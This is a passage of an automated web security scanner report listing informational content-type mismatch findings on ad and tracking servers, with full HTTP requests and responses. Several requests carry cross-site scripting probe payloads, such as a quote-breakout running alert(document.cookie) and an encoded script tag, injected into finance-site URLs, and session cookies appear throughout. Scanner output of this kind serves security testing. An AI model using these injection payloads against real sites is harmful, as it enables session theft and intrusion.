Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:27 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 13:00:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 903

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd1
...[SNIP]...

34.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:50 GMT; path=/
Set-Cookie: i_1=33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 13:00:50 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 897

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d
...[SNIP]...

34.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:59:25 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2; expires=Tue, 01-Mar-2011 17:59:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 885

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8
...[SNIP]...

34.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:27:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:27:28 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:27:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 843

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f
...[SNIP]...

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252
...[SNIP]...

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:47 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 12:56:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 813

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183b
...[SNIP]...

34.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:27:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.16. http://ak.c.ooyala.com/d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ak.c.ooyala.com
Path:   /d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7 HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: EG8XRIBClhILODMzSqFYpTUV1s11FaVjuj/CQ8KG1/v1Shkq13iSIavdE5UMW3Yr
x-amz-request-id: 8815EEFB3E746788
Last-Modified: Fri, 28 Jan 2011 10:49:14 GMT
ETag: "8c0fc563fdfc0c9d7a30eaeb086a342d"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 286
Server: AmazonS3
Cache-Control: max-age=604800
Date: Sun, 30 Jan 2011 12:49:01 GMT
Connection: close

x...;o.0.....[Rrwy`Wv..R..
...bB.IP.A.O_.T.b@]2..=..;K...{.....E].........*7..x..0I..>.........\........O.q.m....}S.......?f3z.B....i9...+........bg.......<..X;........p..p.I.Q...... ...x.&..P5..<.4..
...[SNIP]...

34.17. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:18:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a222
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1

;

34.18. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Firm
